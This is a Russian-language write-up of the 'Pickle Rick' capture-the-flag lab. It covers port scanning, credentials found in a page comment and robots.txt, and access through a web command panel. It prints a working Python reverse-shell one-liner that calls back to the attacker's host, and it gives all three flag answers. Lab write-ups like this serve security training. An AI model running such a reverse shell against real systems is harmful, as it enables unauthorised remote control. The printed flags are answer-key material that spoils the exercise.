<h1>Отчет по задаче Pickle Rick</h1> <h3> Тестируемые устройства </h3> | Устройство | IP | | -------- | -------- | | VM1 | 10.10.142.222 | <h3> Разведка </h3> Прогоняем виртуальную машину через nmap и gobuster и получаем следующие данные: На машине открыты порты: | Порт | Служба | | ------- | -------- | | 80 | http (Apache httpd 2.4.18 (Ubuntu)) | | 22 | ssh (OpenSSH 7.2p2)| А также gobuster нашел директорию /assets и страницу /login.php <h3> Содержание </h3> Порт 80 открыт, а значит можно зайти на сайт. Заходим и видим следующий текст ![](https://i.imgur.com/h2TvgaR.jpg) После, зайдя в исходный код можно увидеть комментарий: ![](https://i.imgur.com/Q62GFay.png) Теперь мы знаем нужный нам username. Пароль для него можно узнать зайдя в /robots.txt - там будет пароль - Wubbalubbadubdub Теперь у нас есть юзернейм: R1ckRul3s и пароль Wubbalubbadubdub Сначала я попробовал подключиться с этим логином и паролем по ssh, но мне выдало ошибку, поэтому я попробовал зайти в login.php: ![](https://i.imgur.com/DIz0s3N.png) И с данными логином и паролем у меня зашло. Далее перед нами предстает следующий сайт: ![](https://i.imgur.com/Z1BmJ7C.png) Это - командная панель нужной нам машины. Введя команду ls мы получим список файлов в этой директории ``` Sup3rS3cretPickl3Ingred.txt assets clue.txt denied.php index.html login.php portal.php robots.txt ``` Команда cat была заблокирована сайтом: ![](https://i.imgur.com/WrykBFj.png) Поэтому я решил подключиться с помощью сгенерированного реверс шелла: ``` export RHOST="10.18.62.112";export RPORT=9001;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'``` И подключился! Прочитал первый флаг: ```mr. meeseek hair``` И, покопавшись в системе нашел в /root/3rd.txt и /home/rick/second ingredients другие два флага: ```jerry tear``` ```fleeb juice```